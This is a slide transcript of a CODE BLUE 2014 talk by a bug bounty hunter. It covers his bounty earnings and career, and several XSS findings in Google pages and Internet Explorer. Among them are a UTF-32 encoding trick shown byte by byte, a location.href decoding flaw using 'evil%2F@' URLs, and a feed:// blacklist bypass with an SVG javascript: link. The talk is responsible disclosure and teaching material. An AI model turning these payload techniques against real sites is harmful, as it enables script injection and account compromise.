CODE BLUE 2014 : Joy of a bug hunter by Masato Kinugawa

Posted on 06-Aug-2015


Transcript of CODE BLUE 2014 : Joy of a bug hunter by Masato Kinugawa

Bug-hunter’s Joy

Masato Kinugawa

Name: Masato Kinugawa
Nationality: Japanese (maybe)
Hobby: Listening to music and XSS
Profession: Bug-hunter

First: Bug-Hunter’s Life and Bounty Program

Second: Delightful Bugs

Third: The reasons why I became a Bug-hunter

Bug-hunter’s Life and Bounty Program

Workplace: Home
Working Hours: Any time I want
Work: Finding Security Bugs
Income: Bug Bounty

➡Does it make enough money to live?

27135346 (JPY) $142723 ($1 = 120 JPY)

27135346 (JPY) $142723 ($1 = 120 JPY) (in Octal digits)

! Google launched in 2010
! Followed by Many Companies

! Google Vulnerability Reward Program
! 1 bug = $100~20,000

$130,803.7 Total Bounties

Number of bugs reported

127 (191 including duplicated and/or not rewarded ones)

Even more motivated by the increased bounty rates! $

I am actually a night owl…

! Quick response since the program was launched.

! Consider NOT ONLY seriousness, but also the level of “interesting” of the bug.

! Require only a simple explanation to have them understand the problem.

! Provide fun to the reporters.

! The Most Important Domain of Google
! Bounty was $5,000 (Exceeds the regulated maximum amount at that time)

https://accounts.google.com/example?oe=utf-32

HTTP/1.1 200 OK
Alternate-Protocol: 443:quic,p=0.01
Cache-Control: private, max-age=0
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-32
...

! Character Code can be set by URL
! UTF-32 was able to be set

∀㸀㰀script㸀alert(1)㰀/script㸀

➊ Array of the Bytes

❷ Character Code of the Page

❸ Handling 0x00 Characters

00  00  22  00  00  00  3E  00  00  00  3C  00  00  00  00  73  00  00  00  63  00  00  00  72  00  00  00  69  00  00  00  70  00  00  00  74  00  00  3E  00  00  00  00  61  00  00  00  6C  00  00  00  65  00  00  00  72  00  00  00  74  00  00  00  28  00  00  00  31  00  00  00  29  00  00  3C  00  00  00  00  2F  00  00  00  73  00  00  00  63  00  00  00  72  00  00  00  69  00  00  00  70  00  00  00  74  00  00  3E  00  

∀ 㸀 㰀 s c r i p t 㸀 a l e r t ( 1 ) 㰀 / s c r i p t 㸀 (one character per 4-byte group above)

In UTF-32, 1 character requires 4 bytes


IE does not support UTF-32 ➡ the character code has to be “recognized” as something else


This “super great” web site shows the character-code support status of all web browsers: http://l0.cm/encodings/table/

IE (<=9) ignores the characters ➡ the “00” bytes are understood as nothing.


"><script>alert(1)</script> (what IE sees once the 0x00 bytes are dropped)

Message from the web page

Seek browser and plug-in bugs also

! 28.7% of total number of bugs I reported
! 87% of them are with IE

! Take longer to fix
! Even if it is fixed, it is NOT likely to be applied to the different IE versions.

Something is required at the Web service level

Therefore

location.href is a method to get the URL of the page by JavaScript

Page URL: http://example.com/ ➡ location.href: http://example.com/

Page URL: http://evil%2F@example.com/ ➡ location.href: http://evil/@example.com/

The URL part before @ is automatically decoded! ➡ It becomes a URL that points to an external web site

All code that uses location.href to build a URL pointing to its own domain is potentially vulnerable
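An added Python model (not the talk's code) of the location.href behaviour just described: one function mimics IE's decoding of the part before “@”, and the other is the check a page should make before sending a request to a URL rebuilt from location.href. The helper names are assumptions.

```python
from urllib.parse import urlsplit, unquote


def ie_location_href(url: str) -> str:
    """Model of the IE behaviour on the slides: the userinfo part of the URL
    (between '//' and '@' in the authority) comes back percent-decoded.
    Hypothetical helper, not a real browser API."""
    start = url.find("//")
    if start == -1:
        return url
    start += 2
    end = url.find("/", start)
    if end == -1:
        end = len(url)
    authority = url[start:end]
    at = authority.rfind("@")
    if at == -1:
        return url
    return url[:start] + unquote(authority[:at]) + authority[at:] + url[end:]


def target_host(href: str) -> str:
    """Host a URL is actually sent to when it is used as a link or request."""
    return urlsplit(href).hostname or ""


def same_site_url(href: str, expected_host: str) -> bool:
    """Defender's check: a URL rebuilt from location.href must still resolve to
    the host the page believes it lives on; otherwise do not request it."""
    return target_host(href) == expected_host


if __name__ == "__main__":
    href = ie_location_href("http://evil%2F@example.com/")
    print(href)                                # http://evil/@example.com/
    print(target_host(href))                   # evil
    print(same_site_url(href, "example.com"))  # False
```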

Added characters before “@”, then checked whether any web pages send a request to external sites

Therefore

http://evil%2F@www.youtube.com/

! Found a fatal bug at the same time
! Exists in feed:// URLs that represent RSS
! Can extract an unrelated feed into any domain by customizing the part of the URL before @
! Put scripts in the unrelated feed, and XSS works on the extracted domain

We can enforce XSS on any web site \(^o^)/ yeah☆

therefore

In feed:// URLs, characters which can run scripts are restricted. (= Blacklist)

It is easy; just pass through the blacklist!

Things to do

<a href="javascript:alert(1)">XSS</a> ➡ <a>XSS</a>

Find out the characters which can pass through based on the character removal pattern

Beeping!

<svg><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="1000" height="1000" /></a></svg>

Silence…

feed://l0.cm%2Fcb.rss%3F@codeblue.jp/

alert('CODE BLUE、2回目開催おめでとう!\n'+ document.domain+'から')

(Congratulations on the 2nd Code Blue)

! Web applications are in jeopardy caused by character codes, browser behaviors / bugs, and so on…

! Finding out mysteriously complicated bugs is the ultimate delight.

You want to see more? http://masatokinugawa.l0.cm/

! Grew up in touch with computers.

! Love to disassemble anything

! Debut as XSS “attacker” in the 6th grade

! Grew up in touch with computers. ➡ I got to know what binary is in 2009
! Love to disassemble anything ➡ Don’t love to do it (so much)
! Debut as XSS “attacker” in the 6th grade ➡ I got interested in security in 2009

Decided to do what I want, in my way

~2009: A lot happened
2010: Left computer vocational school

What I want to do: Seeking vulnerabilities

Found so many!

Soon after, Google launched its bug bounty program

Spent all waking hours to find vulnerabilities.

Bug hunting house-husband? ➡ Need to gain girl-hunting skill also ☺

! Extension of what I want to do
! Found myself as a bug-hunter, one day

Wish for future…

! Must spend most of the time repeating unsophisticated verification tests

! No income unless I find anything

! Feeling of accomplishment is great, as what I achieved directly becomes money

! Nothing in the world feels as delightful as treasure hunting.

! Abnormal behaviors are much fun to see

However…

The finding skill is all you need: Can concentrate on improving skill

Can do by yourself: Almost no human relationship issues

Can do at your home: No commuting time

Can work at own pace: Can do when you want

“Listen to music” as a hobby ➡ “Bug-hunt” as a hobby (same as above)

“Hobby”

Do anything you want! Then, you may find your own way.

For those who are trying to find your way...

Understood?!

Thank You!

@kinugawamasato

✉ masatokinugawa [at] gmail.com

Contact